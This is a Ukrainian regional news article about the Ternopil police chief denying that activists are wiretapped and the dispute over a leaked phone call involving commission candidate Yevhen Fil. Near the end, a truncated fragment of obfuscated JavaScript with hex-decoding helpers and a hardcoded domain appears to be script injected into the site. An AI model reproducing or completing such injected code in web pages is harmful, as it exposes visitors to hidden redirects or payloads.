Ви знаходитесь: Головна / Новини / Головний поліцейський області запевнив, що активістів не прослуховують

Головний поліцейський області запевнив, що активістів не прослуховують

Вибачення перед Євгеном Філем не буде! Як заявив головний полісмен області, доки він на цій посаді, то робитиме те, що вимагає закон. До того ж, додав, інформація стосовно прослуховування активістів та громадських діячів – неправдива!

Оприлюднена на останній сесії облради телефонна розмова Євгена Філя та підозрюваного у кримінальній справі – Ігора Вардинця не залишилася поза увагою. Нагадаємо, в розмові чоловіки говорили про плани «очищення» поліцейських рядів.

ОЛЕКСАНДР БОГОМОЛ, т.в.о. начальника ГУНП в Тернопільській області

«Євген Васильович каже: – А ви знаєте, який я зараз ранг займаю?

Підозрюваний: – Не знаю.

Євген Васильович: – Вся міліція, я є член комісії по призначенню всіх.

Підозрюваний: – Правильно, їх треба всіх на… вигнати і нових набрати.

Євген Васильович: – Правильно, ая.

Підозрюваний перебиває: – Бо вони мене катували цілий рік, вони не хочуть зрозуміти, не хочуть, то продовжується, мене катували. Я вам кажу, хлопчики, не получиться, не получиться, бо в мене є такі друзі, як Євген Філь».

Після чого, Олександр Богомол звернувся до депутатів з проханням замінити кандидата до поліцейської конкурсної комісії Євгена Філя на більш об’єктивного. Адже, в перспективі вона мала займатися кадровими питаннями, а саме підбором нових правоохоронців на вакантні посади або ж підвищенням працівників. В результаті, депутати на останньому пленарному засіданні це питання не розглядали, ймовірно, повернуться до нього на наступному. Натомість, днями Євген Філь заявив, що телефонна розмова змонтована, вирвана з контексту та, взагалі, є втручанням у його особисте життя.

ЄВГЕН ФІЛЬ, один з кандидатів до конкурсної комісії

«Проблема полягає в тому, що вся та розмова була змонтована. Це просто вирвано з контексту розмови, яка була на прослушці Ігора Степановича Вардинця і вона була змонтовано до того. Потім, Богомол на кінець говорить: «Дальше вони домовляються про зустріч». Я вам гарантовано говорю, що я з Вардинцем останній раз зустрічався 2-3 роки назад, ще до його арешту, я може десь рік з ним не зустрічався. Це є втручання в моє особисте життя».

І додав, що очікує від Олександра Богомола публічного вибачення, а також зняття питання на наступній сесії облради щодо заміни його кандидатури в складі комісії. В свою чергу керівник обласної поліції пояснив, оприлюднення даної інформації було легальним.

ОЛЕКСАНДР БОГОМОЛ, т.в.о. начальника ГУНП в Тернопільській області

«Матеріали, ще раз повторюся, були легалізовані. Тобто, ми проводили слідчо-розшукові дії відносно підозрюваного, матеріали були легалізовані, я отримав дозвіл слідчого на розголошення матеріалів досудового розслідування. Ту розмову, яку мені надано було органами досудового розслідування, я її озвучив. Тобто, я її не монтував. Чи монтували її до мене? То я сумніваюся, що хтось би це робив, тобто, сенсу тут я не бачу».

Спростував Олександр Богомол і чутки щодо прослуховування активістів та волонтерів правоохоронцями.

ДМИТРО ГАЙДУЦЬКИЙ, голова ГО «Автомайдан Тернопіль»

«Ми дико обурені тим, що зараз збирається якась інформація, якісь прослуховування активістів. Тобто, ми зараз не впевнені, що зараз мене не слухають, Лілю (Мусіхіну – прим. ред.) і решту активістів».

ОЛЕКСАНДР БОГОМОЛ, т.в.о. начальника ГУНП в Тернопільській області

«Ніякого збору інформації по громадських активістах, по їх руху, по їх політичній діяльності ми не проводимо».

Що ж до Євгена Філя та його членства у комісії, останнє слово буде за обласною радою, ймовірно, вже наступного пленарного засідання.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top